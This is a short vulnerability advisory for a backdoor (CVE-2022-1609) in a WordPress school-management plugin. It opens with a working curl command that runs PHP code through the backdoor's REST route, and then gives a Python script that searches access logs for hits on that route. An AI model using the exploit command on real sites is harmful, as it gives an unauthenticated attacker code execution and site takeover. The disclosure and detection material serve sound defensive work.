CVE-2022-1609 WordPress Weblizar Backdoor
```
curl -s -d 'blowfish=1' -d "blowf=system('id');" 'localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
The School Management WordPress plugin prior to 9.9.7 contains an obfuscated backdoor injected in its license-checking code. The backdoor registers a REST API handler that allows an unauthenticated malicious user to execute arbitrary PHP code on the site.
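For triage of a site that ran an affected version, the following added example (not part of the original page or the plugin's code) scans web server access logs for requests that address the backdoor's REST route. It assumes the Apache/nginx "combined" log format; the function names and sample log lines are constructed for illustration, and the plain-permalink `rest_route` form is covered in addition to the `/wp-json/` form shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# REST route taken from the request shown on this page.
BACKDOOR_ROUTE = "/am-member/license"

# Apache/nginx "combined" log format (assumption; adjust for your server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def rest_route_of(target):
    """Return the WordPress REST route a request target addresses, or None."""
    parts = urlsplit(target)
    # Decode and case-fold so encoded or re-cased variants are still reported.
    path = unquote(parts.path).lower()
    marker = "/wp-json/"  # pretty permalinks, wherever the prefix sits in the path
    if marker in path:
        return "/" + path.split(marker, 1)[1].strip("/")
    # Plain permalinks: /?rest_route=/<route> (parse_qs percent-decodes the value)
    values = parse_qs(parts.query).get("rest_route")
    if values:
        return "/" + values[0].lower().strip("/")
    return None

def find_backdoor_requests(lines):
    """Return parsed log entries that address the backdoor's REST route."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and rest_route_of(m["target"]) == BACKDOOR_ROUTE:
            hits.append({k: m[k] for k in ("ip", "ts", "method", "status")})
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [20/May/2022:10:01:02 +0000] "POST /wp-json/am-member/license HTTP/1.1" 200 61 "-" "curl/7.81.0"',
    '198.51.100.7 - - [20/May/2022:10:01:09 +0000] "POST /?rest_route=%2Fam-member%2Flicense HTTP/1.1" 200 61 "-" "curl/7.81.0"',
    '203.0.113.5 - - [20/May/2022:10:02:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [20/May/2022:10:03:00 +0000] "GET /wp-json/am-member/license/ HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_backdoor_requests(SAMPLE_LOG):
        print(hit)
```

Access logs in this format do not record POST bodies, so the `blowfish` and `blowf` parameters will not appear; any request to the route on a site that ran a version before 9.9.7 warrants investigation.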
Vulnerable product: weblizar school management